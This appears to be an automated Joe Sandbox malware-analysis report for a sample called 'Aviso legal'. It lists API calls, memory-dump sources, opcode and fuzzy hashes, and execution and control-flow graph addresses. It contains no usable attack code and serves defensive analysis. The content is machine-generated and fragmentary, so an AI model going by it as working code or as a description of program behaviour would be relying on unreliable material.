                                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                APIs
                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: lstrlen$CharNextlstrcmpi
                                • String ID:
                                • API String ID: 190613189-0
                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

                                Execution Graph

                                Execution Coverage:10.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:155
                                Total number of Limit Nodes:15
                                execution_graph 40572 3930ce80 DuplicateHandle 40573 3930cf16 40572->40573 40574 395dbd88 40575 395dbdb0 40574->40575 40578 395dbddc 40574->40578 40576 395dbdb9 40575->40576 40579 395db1f4 40575->40579 40580 395db1ff 40579->40580 40582 395dc0d3 40580->40582 40583 395db210 40580->40583 40582->40578 40584 395dc108 OleInitialize 40583->40584 40585 395dc16c 40584->40585 40585->40582 40542 1664f0 40543 16650e 40542->40543 40546 164e34 40543->40546 40545 166545 40549 168010 LoadLibraryA 40546->40549 40548 168109 40549->40548 40550 3930cc38 40551 3930cc7e GetCurrentProcess 40550->40551 40553 3930ccd0 GetCurrentThread 40551->40553 40554 3930ccc9 40551->40554 40555 3930cd06 40553->40555 40556 3930cd0d GetCurrentProcess 40553->40556 40554->40553 40555->40556 40559 3930cd43 40556->40559 40557 3930cd6b GetCurrentThreadId 40558 3930cd9c 40557->40558 40559->40557 40586 ad030 40587 ad048 40586->40587 40588 ad0a2 40587->40588 40591 395d7508 40587->40591 40595 395d4394 40587->40595 40592 395d752e 40591->40592 40593 395d4394 2 API calls 40592->40593 40594 395d754f 40593->40594 40594->40588 40596 395d439f 40595->40596 40597 395d86c9 40596->40597 40599 395d86b9 40596->40599 40612 395d82bc 40597->40612 40603 395d88bc 40599->40603 40608 395d87f0 40599->40608 40600 395d86c7 40604 395d887a 40603->40604 40605 395d88ca 40603->40605 40619 395d88a8 40604->40619 40606 395d8890 40606->40600 40610 395d8804 40608->40610 40609 395d8890 40609->40600 40611 395d88a8 2 API calls 40610->40611 40611->40609 40613 395d82c7 40612->40613 40614 395d9b7c 40613->40614 40615 395d9ad2 40613->40615 40616 395d4394 CallWindowProcW 40614->40616 40617 395d9b2a CallWindowProcW 40615->40617 40618 395d9ad9 40615->40618 40616->40618 40617->40618 40618->40600 40620 395d88b9 40619->40620 40622 395d9a60 40619->40622 40620->40606 40623 395d9a6f 40622->40623 40624 395d9ac3 40622->40624 40627 395d82bc CallWindowProcW 40623->40627 40625 395d9b7c 40624->40625 40626 395d9ad2 40624->40626 40628 395d4394 CallWindowProcW 40625->40628 40629 395d9b2a CallWindowProcW 40626->40629 40631 395d9ad9 40626->40631 40630 395d9a7a 40627->40630 40628->40631 40629->40631 40630->40620 40631->40620 40560 395d0b70 40561 395d0ba0 40560->40561 40564 395d08d8 40561->40564 40563 395d0c50 40565 395d08e3 40564->40565 40567 395d2081 40565->40567 40568 395d0a7c 40565->40568 40567->40563 40569 395d21e0 FindWindowW 40568->40569 40571 395d2265 40569->40571 40571->40567 40632 160848 40634 16084e 40632->40634 40633 16091b 40634->40633 40638 161332 40634->40638 40643 3930bb30 40634->40643 40647 3930bb20 40634->40647 40640 16133d 40638->40640 40639 161430 40639->40634 40640->40639 40651 161650 40640->40651 40655 161660 40640->40655 40644 3930bb3f 40643->40644 40687 3930b2a4 40644->40687 40648 3930bb30 40647->40648 40649 3930b2a4 2 API calls 40648->40649 40650 3930bb60 40649->40650 40650->40634 40652 161646 40651->40652 40652->40651 40653 161769 40652->40653 40659 161772 40652->40659 40653->40640 40656 161666 40655->40656 40657 161769 40656->40657 40658 161772 LdrInitializeThunk 40656->40658 40657->40640 40658->40656 40660 161799 40659->40660 40661 1617b5 40660->40661 40667 161d72 40660->40667 40671 161d78 40660->40671 40662 1617bd 40661->40662 40675 16e378 40661->40675 40679 16e368 40661->40679 40662->40652 40668 161d78 40667->40668 40683 161a60 40668->40683 40670 161db5 40670->40670 40672 161d8e 40671->40672 40673 161a60 LdrInitializeThunk 40672->40673 40674 161db5 40673->40674 40674->40674 40676 16e38e 40675->40676 40677 161a60 LdrInitializeThunk 40676->40677 40678 16e3be 40677->40678 40680 16e38e 40679->40680 40681 161a60 LdrInitializeThunk 40680->40681 40682 16e3be 40681->40682 40684 161a6b 40683->40684 40685 1622ca 40684->40685 40686 1622b8 LdrInitializeThunk 40684->40686 40685->40670 40686->40685 40688 3930b2af 40687->40688 40691 3930c9fc 40688->40691 40690 3930d4e6 40690->40690 40692 3930ca07 40691->40692 40693 3930dc0c 40692->40693 40695 3930f878 40692->40695 40693->40690 40696 3930f8a9 40695->40696 40697 3930f8cd 40696->40697 40700 3930fa38 40696->40700 40704 3930fa29 40696->40704 40697->40693 40701 3930fa45 40700->40701 40702 3930fa7e 40701->40702 40708 3930ec50 40701->40708 40702->40697 40705 3930fa45 40704->40705 40706 3930fa7e 40705->40706 40707 3930ec50 2 API calls 40705->40707 40706->40697 40707->40706 40709 3930ec5b 40708->40709 40711 3930faf0 40709->40711 40712 3930ec84 40709->40712 40713 3930ec8f 40712->40713 40716 395d4fa8 40713->40716 40714 3930fb99 40714->40711 40718 395d4faf 40716->40718 40717 395d4fed 40717->40714 40718->40717 40721 395d62a8 40718->40721 40725 395d62b8 40718->40725 40722 395d62b7 40721->40722 40723 395d6392 40722->40723 40729 395d71f2 40722->40729 40723->40723 40726 395d62e3 40725->40726 40727 395d6392 40726->40727 40728 395d71f2 2 API calls 40726->40728 40728->40727 40732 395d7213 40729->40732 40730 395d7359 CreateWindowExW 40733 395d7474 40730->40733 40732->40723 40732->40730 40734 395d7350 CreateWindowExW 40732->40734 40735 395d71f2 CreateWindowExW 40732->40735 40734->40732 40735->40732

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 263 3611ccc0-3611cce1 264 3611cce3-3611cce6 263->264 265 3611cce8-3611cd0b 264->265 266 3611cd0c-3611cd0f 264->266 265->266 267 3611cd11-3611cd34 266->267 268 3611d4b0-3611d4b2 266->268 277 3611cd36-3611cd39 267->277 278 3611cd4d-3611cd57 267->278 270 3611d4b4 268->270 271 3611d4b9-3611d4bc 268->271 270->271 271->264 273 3611d4c2-3611d4cb 271->273 277->278 279 3611cd3b-3611cd4b 277->279 281 3611cd5d-3611cd78 call 3611a9a8 278->281 279->281 285 3611cd85-3611d062 281->285 286 3611cd7a-3611cd80 281->286 307 3611d4a2-3611d4af 285->307 308 3611d068-3611d117 285->308 286->273 317 3611d140 308->317 318 3611d119-3611d13e 308->318 320 3611d149-3611d152 call 3611a9b4 317->320 318->320 322 3611d157-3611d15c 320->322 323 3611d162-3611d184 call 3611a9c0 322->323 324 3611d489-3611d495 322->324 323->324 328 3611d18a-3611d194 323->328 324->308 326 3611d49b 324->326 326->307 328->324 329 3611d19a-3611d1a5 328->329 329->324 330 3611d1ab-3611d281 329->330 342 3611d283-3611d285 330->342 343 3611d28f-3611d2bf 330->343 342->343 347 3611d2c1-3611d2c3 343->347 348 3611d2cd-3611d2d9 343->348 347->348 349 3611d339-3611d33d 348->349 350 3611d2db-3611d2df 348->350 351 3611d343-3611d37f 349->351 352 3611d47a-3611d483 349->352 350->349 353 3611d2e1-3611d30b 350->353 364 3611d381-3611d383 351->364 365 3611d38d-3611d39b 351->365 352->324 352->330 360 3611d319-3611d336 call 3611a9cc 353->360 361 3611d30d-3611d30f 353->361 360->349 361->360 364->365 368 3611d3b2-3611d3bd 365->368 369 3611d39d-3611d3a8 365->369 373 3611d3d5-3611d3e6 368->373 374 3611d3bf-3611d3c5 368->374 369->368 372 3611d3aa 369->372 372->368 378 3611d3e8-3611d3ee 373->378 379 3611d3fe-3611d40a 373->379 375 3611d3c7 374->375 376 3611d3c9-3611d3cb 374->376 375->373 376->373 380 3611d3f0 378->380 381 3611d3f2-3611d3f4 378->381 383 3611d422-3611d473 379->383 384 3611d40c-3611d412 379->384 380->379 381->379 383->352 385 3611d414 384->385 386 3611d416-3611d418 384->386 385->383 386->383
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: $!r$$!r$$!r$$!r$$!r$$!r
                                • API String ID: 0-3478522173
                                • Opcode ID: aec2df89575fd50655b1173f54fa24f11d330e7d087196f1822899fc4fd8614e
                                • Instruction ID: f9bc58b2d368b03253166720707854306c452391bf7cdf7a8a76543590e7ceab
                                • Opcode Fuzzy Hash: aec2df89575fd50655b1173f54fa24f11d330e7d087196f1822899fc4fd8614e
                                • Instruction Fuzzy Hash: 40324031E10719CBDB14DF69C89459DB7B2BFC9300F6086AAD409A7254EF70AD85CF91
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 88cb405691ca1ec4741c25a9889ec11eb505894ad95ccb27b6778701dc5b571e
                                • Instruction ID: c1d6b6e091afce9e4e19bbd159794793c2c63e870c365144acbb0a248084b858
                                • Opcode Fuzzy Hash: 88cb405691ca1ec4741c25a9889ec11eb505894ad95ccb27b6778701dc5b571e
                                • Instruction Fuzzy Hash: 1E63D631D10B1A8ADB11EF68C894699F7B1FF99300F11D79AE45877221FB70AAD4CB81
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 05b10e210caa92e94ff386f694be41137d7b79b5571e5f58672455625114b427
                                • Instruction ID: 5c02d6961ccc7bcde4439d18fa3a3edaa61a7e524d300859dc5a62e3355d2d0d
                                • Opcode Fuzzy Hash: 05b10e210caa92e94ff386f694be41137d7b79b5571e5f58672455625114b427
                                • Instruction Fuzzy Hash: 8B03C731D20B1A8ADB11EF68C894699F7B1FF99300F51D79AE05877121FB70AAD4CB81
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f932e6a5170fc1bb8aa0050b5019f8135125e2b3351b93e0a2f792acb1eea93f
                                • Instruction ID: a0a3c62642ab9bf50f424330126e189d8410e49575a9f93d4b81fad7f9644f63
                                • Opcode Fuzzy Hash: f932e6a5170fc1bb8aa0050b5019f8135125e2b3351b93e0a2f792acb1eea93f
                                • Instruction Fuzzy Hash: 70A10679E042158FEB308BA9D88075EFBF2EB45350F24857AE469DB282C731DD41CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 394 3611ad70-3611ad72 395 3611ad74-3611ad8c call 3611ad70 394->395 396 3611ad9a-3611ad9d 394->396 399 3611ad92-3611ad95 395->399 397 3611adac-3611adaf 396->397 398 3611ad9f-3611ada7 call 3611a844 396->398 401 3611adb1-3611adb6 397->401 402 3611adb9-3611adbc 397->402 398->397 399->396 401->402 404 3611adcf-3611add2 402->404 405 3611adbe-3611adc4 402->405 408 3611add4-3611adf5 404->408 409 3611adfa-3611adfd 404->409 406 3611ae64-3611ae66 405->406 407 3611adca 405->407 406->398 410 3611ae6c 406->410 407->404 408->409 411 3611ae08-3611ae0b 409->411 412 3611adff-3611ae01 409->412 413 3611ae71-3611ae73 410->413 416 3611ae0d-3611ae20 call 3611b28f 411->416 417 3611ae2e-3611ae31 411->417 414 3611ae33-3611ae46 412->414 415 3611ae03 412->415 419 3611ae75 413->419 420 3611ae7a-3611ae7d 413->420 421 3611ae4b-3611ae4e 414->421 415->411 425 3611ae26-3611ae29 416->425 417->414 417->421 419->420 423 3611ae83-3611ae90 420->423 424 3611ac87-3611ac8a 420->424 427 3611ae50-3611ae5a call 3611a850 421->427 428 3611ae5f-3611ae62 421->428 429 3611ac90-3611ac93 424->429 430 3611ae93-3611aecb 424->430 425->417 427->428 428->406 428->413 433 3611ac95-3611acc5 call 36119fac 429->433 434 3611acca-3611accd 429->434 440 3611aed2-3611af0a 430->440 433->434 435 3611ad0f-3611ad12 434->435 436 3611accf-3611ad0a call 36119fac 434->436 435->440 441 3611ad18-3611ad1b 435->441 436->435 448 3611af11-3611af7a 440->448 444 3611ad54-3611ad57 441->444 445 3611ad1d-3611ad4f 441->445 444->448 449 3611ad5d-3611ad60 444->449 445->444 464 3611af7c-3611af7f 448->464 451 3611ad62-3611ad6a 449->451 452 3611ad6f 449->452 451->452 452->394 465 3611af81-3611af97 call 3611a85c 464->465 466 3611af9c-3611af9f 464->466 465->466 468 3611afa1-3611afa3 466->468 469 3611afaa-3611afad 466->469 471 3611afa5 468->471 472 3611b01a-3611b022 468->472 473 3611b025-3611b05d 469->473 474 3611afaf-3611afb2 469->474 471->469 489 3611b064-3611b10d 473->489 475 3611afb4-3611afb6 474->475 476 3611afbd-3611afc0 474->476 477 3611afb8 475->477 478 3611afea-3611affe 475->478 479 3611afc2-3611afcc call 3611a868 476->479 480 3611afd8-3611afdb 476->480 477->476 487 3611b003-3611b006 478->487 485 3611afd1-3611afd3 479->485 483 3611afe5-3611afe8 480->483 484 3611afdd-3611afe2 480->484 483->478 483->487 484->483 485->480 487->489 490 3611b008-3611b00a 487->490 502 3611b115-3611b11b 489->502 503 3611b10f-3611b112 489->503 491 3611b011-3611b014 490->491 492 3611b00c 490->492 491->464 491->472 492->491 504 3611b129-3611b148 502->504 505 3611b11d-3611b126 502->505 503->502 506 3611b14e-3611b159 504->506 505->504 507 3611b162-3611b176 506->507 508 3611b15b-3611b161 506->508 508->507
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: D@$D@$D@$D@$D@
                                • API String ID: 0-3094064158
                                • Opcode ID: 47d585595c57cac8bda507258c63c5b0fb38e9f29da4b0576a987a4022c37869
                                • Instruction ID: 28105aaab0a0a33891a4f357b45b810b5bb789e8c58a4c7adcf9bf19202bcfba
                                • Opcode Fuzzy Hash: 47d585595c57cac8bda507258c63c5b0fb38e9f29da4b0576a987a4022c37869
                                • Instruction Fuzzy Hash: 01D1A074E002199FEF10DFA9C880B9EBBB6EF89310F208569E509EB291D775DD41CB91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 512 3930cc28-3930ccc7 GetCurrentProcess 516 3930ccd0-3930cd04 GetCurrentThread 512->516 517 3930ccc9-3930cccf 512->517 518 3930cd06-3930cd0c 516->518 519 3930cd0d-3930cd41 GetCurrentProcess 516->519 517->516 518->519 521 3930cd43-3930cd49 519->521 522 3930cd4a-3930cd65 call 3930ce14 519->522 521->522 525 3930cd6b-3930cd9a GetCurrentThreadId 522->525 526 3930cda3-3930ce05 525->526 527 3930cd9c-3930cda2 525->527 527->526
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 3930CCB6
                                • GetCurrentThread.KERNEL32 ref: 3930CCF3
                                • GetCurrentProcess.KERNEL32 ref: 3930CD30
                                • GetCurrentThreadId.KERNEL32 ref: 3930CD89
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6071785187.0000000039300000.00000040.00000800.00020000.00000000.sdmp, Offset: 39300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_39300000_Aviso legal.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 97dd5d91e2c91a81d3bf6e8c55410725008247fc1813d92050526c6a4034c140
                                • Instruction ID: af92b8b4be4c46b466c1037424b328e6ff88ebe8ad5752f9bf6e00263b92997c
                                • Opcode Fuzzy Hash: 97dd5d91e2c91a81d3bf6e8c55410725008247fc1813d92050526c6a4034c140
                                • Instruction Fuzzy Hash: B9516AB49016498FDB40CFAAC544BEEBBF1BF88300F20845AE40AB73A0D7749981CF65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 534 3930cc38-3930ccc7 GetCurrentProcess 538 3930ccd0-3930cd04 GetCurrentThread 534->538 539 3930ccc9-3930cccf 534->539 540 3930cd06-3930cd0c 538->540 541 3930cd0d-3930cd41 GetCurrentProcess 538->541 539->538 540->541 543 3930cd43-3930cd49 541->543 544 3930cd4a-3930cd65 call 3930ce14 541->544 543->544 547 3930cd6b-3930cd9a GetCurrentThreadId 544->547 548 3930cda3-3930ce05 547->548 549 3930cd9c-3930cda2 547->549 549->548
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 3930CCB6
                                • GetCurrentThread.KERNEL32 ref: 3930CCF3
                                • GetCurrentProcess.KERNEL32 ref: 3930CD30
                                • GetCurrentThreadId.KERNEL32 ref: 3930CD89
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6071785187.0000000039300000.00000040.00000800.00020000.00000000.sdmp, Offset: 39300000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_39300000_Aviso legal.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 9fb80f7ff2758193b034c5d74fffb9b39e3c3fe879f5d5dd390299d731f2ea1b
                                • Instruction ID: a363c28ab9b809b7545f741fddea73976b1d1508b4c8c5133c06a9cc6d5697cf
                                • Opcode Fuzzy Hash: 9fb80f7ff2758193b034c5d74fffb9b39e3c3fe879f5d5dd390299d731f2ea1b
                                • Instruction Fuzzy Hash: F75149B49016498FDB40DFAAC544B9EBBF5FF48310F20845AE40AB7390D7749985CF65

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 556 3611e3c8-3611e3ec 557 3611e3ee-3611e3f1 556->557 558 3611e3f3-3611e40d 557->558 559 3611e412-3611e415 557->559 558->559 560 3611eaf4-3611eaf6 559->560 561 3611e41b-3611e513 559->561 563 3611eaf8 560->563 564 3611eafd-3611eb00 560->564 579 3611e596-3611e59d 561->579 580 3611e519-3611e566 call 3611ec72 561->580 563->564 564->557 565 3611eb06-3611eb13 564->565 581 3611e621-3611e62a 579->581 582 3611e5a3-3611e613 579->582 593 3611e56c-3611e588 580->593 581->565 599 3611e615 582->599 600 3611e61e 582->600 597 3611e593-3611e594 593->597 598 3611e58a 593->598 597->579 598->597 599->600 600->581
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: f&r$XP&r$\O&r
                                • API String ID: 0-1621091023
                                • Opcode ID: b94452b282981d1a5b12989cb68af081f394dd9439655259a3241536701c9ebe
                                • Instruction ID: 453f578dddebace762f8c6b089a7bcc935ca3845ef53d3ef5123649946afff46
                                • Opcode Fuzzy Hash: b94452b282981d1a5b12989cb68af081f394dd9439655259a3241536701c9ebe
                                • Instruction Fuzzy Hash: 33616230F002189FEB649BE8C8557AEBBF6EB88300F20852AE105EB395DB749D45CF51

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 631 395d82bc-395d9acc 634 395d9b7c-395d9b9c call 395d4394 631->634 635 395d9ad2-395d9ad7 631->635 643 395d9b9f-395d9bac 634->643 637 395d9ad9-395d9b10 635->637 638 395d9b2a-395d9b62 CallWindowProcW 635->638 646 395d9b19-395d9b28 637->646 647 395d9b12-395d9b18 637->647 641 395d9b6b-395d9b7a 638->641 642 395d9b64-395d9b6a 638->642 641->643 642->641 646->643 647->646
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 395D9B51
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6071955437.00000000395D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 395D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_395d0000_Aviso legal.jbxd
                                Similarity
                                • API ID: CallProcWindow
                                • String ID: d{[9
                                • API String ID: 2714655100-3421385838
                                • Opcode ID: 407b150656dd578ed9d891c3f96e78b57363594548c42a309c362b8184987041
                                • Instruction ID: d4746a54ec8b0e9d8b303dedacd6e41db93aea9c121c36864f62434bd8cbc938
                                • Opcode Fuzzy Hash: 407b150656dd578ed9d891c3f96e78b57363594548c42a309c362b8184987041
                                • Instruction Fuzzy Hash: B1412AB8A05305DFDB00CF99C484AAABBF5FF89310F258459D519AB361D770A881CFA0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1466 3611e3b8-3611e3ec 1467 3611e3ee-3611e3f1 1466->1467 1468 3611e3f3-3611e40d 1467->1468 1469 3611e412-3611e415 1467->1469 1468->1469 1470 3611eaf4-3611eaf6 1469->1470 1471 3611e41b-3611e513 1469->1471 1473 3611eaf8 1470->1473 1474 3611eafd-3611eb00 1470->1474 1489 3611e596-3611e59d 1471->1489 1490 3611e519-3611e566 call 3611ec72 1471->1490 1473->1474 1474->1467 1475 3611eb06-3611eb13 1474->1475 1491 3611e621-3611e62a 1489->1491 1492 3611e5a3-3611e613 1489->1492 1503 3611e56c-3611e588 1490->1503 1491->1475 1509 3611e615 1492->1509 1510 3611e61e 1492->1510 1507 3611e593-3611e594 1503->1507 1508 3611e58a 1503->1508 1507->1489 1508->1507 1509->1510 1510->1491
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: f&r$XP&r
                                • API String ID: 0-3010104400
                                • Opcode ID: 1b290fc901053b92de6786d840ad64ba00835f1bc720176a568b273353eb9f23
                                • Instruction ID: 49d3257e9ab896522ef30998f430ccdd9a1fdc55a5d2a3feda940cd8bc45a113
                                • Opcode Fuzzy Hash: 1b290fc901053b92de6786d840ad64ba00835f1bc720176a568b273353eb9f23
                                • Instruction Fuzzy Hash: 4B517370F102089FEB54DFA8C455B9EBBF6EFC8700F20852AE105EB395DA749D418B90

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1513 3611b28f-3611b292 1514 3611b293-3611b296 1513->1514 1515 3611b307-3611b30a 1514->1515 1516 3611b298-3611b2ec 1514->1516 1517 3611b332-3611b335 1515->1517 1518 3611b30c-3611b32d call 3611a894 1515->1518 1548 3611b2f6-3611b2f8 1516->1548 1521 3611b347-3611b34a 1517->1521 1522 3611b337-3611b342 1517->1522 1518->1517 1524 3611b364-3611b367 1521->1524 1525 3611b34c-3611b35f 1521->1525 1522->1521 1528 3611b369-3611b376 1524->1528 1529 3611b37b-3611b37e 1524->1529 1525->1524 1528->1529 1530 3611b380-3611b382 1529->1530 1531 3611b39f-3611b3ee 1529->1531 1534 3611b384 1530->1534 1535 3611b389-3611b38c 1530->1535 1534->1535 1537 3611b392-3611b39c 1535->1537 1538 3611b27f-3611b282 1535->1538 1538->1514 1541 3611b284-3611b288 1538->1541 1541->1537 1543 3611b28e 1541->1543 1543->1513 1550 3611b300-3611b302 1548->1550 1550->1515
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: D@$nK9r
                                • API String ID: 0-245216030
                                • Opcode ID: 53d1cb2f42b1c5525e6ed00b4971b663e69669d7360823e734a722e465b4f4de
                                • Instruction ID: 2df28710c384701b26a384c3daef98bf13fb3d6ed8683ec2e0fcfcb3d43c6459
                                • Opcode Fuzzy Hash: 53d1cb2f42b1c5525e6ed00b4971b663e69669d7360823e734a722e465b4f4de
                                • Instruction Fuzzy Hash: 7E31B334B142415FEB159BA4C850BAFBBB2EB89350F20882AD546DB2D1CB39DD528785
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6069271540.0000000036110000.00000040.00000800.00020000.00000000.sdmp, Offset: 36110000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_36110000_Aviso legal.jbxd
                                Similarity
                                • API ID:
                                • String ID: N,6
                                • API String ID: 0-2815451019
                                • Opcode ID: d2986fcdd33717d27fb1577bc7f4613bea3522391ff6f75d1882318c11227b52
                                • Instruction ID: 7d09a6a3b2a3c72787a2e0998dbbce1dbd9ee843ed686f9ce2b0a52ad48ff226
                                • Opcode Fuzzy Hash: d2986fcdd33717d27fb1577bc7f4613bea3522391ff6f75d1882318c11227b52
                                • Instruction Fuzzy Hash: 56125A307102029BDB55AB38C86B25A7BE2EBC9764F604939E005EB391CF75EC57DB81
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 395D7462
                                Memory Dump Source
                                • Source File: 0000000A.00000002.6071955437.00000000395D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 395D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_395d0000_Aviso legal.jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 9fd67b4b02641e8d99646ac5914d3be519bdd12ece006d7b453acc1dd44e2b8b
                                • Instruction ID: 93db5d2ab7c5d22d8a930e995cc51fafdee6e457d60701e5fdf5b7793adc5f99
                                • Opcode Fuzzy Hash: 9fd67b4b02641e8d99646ac5914d3be519bdd12ece006d7b453acc1dd44e2b8b
                                • Instruction Fuzzy Hash: 72A16DB0809389DFDB12CFA9C8905DDBFB1FF4A310F5581AAE844AB262C7759885CF51
                                APIs
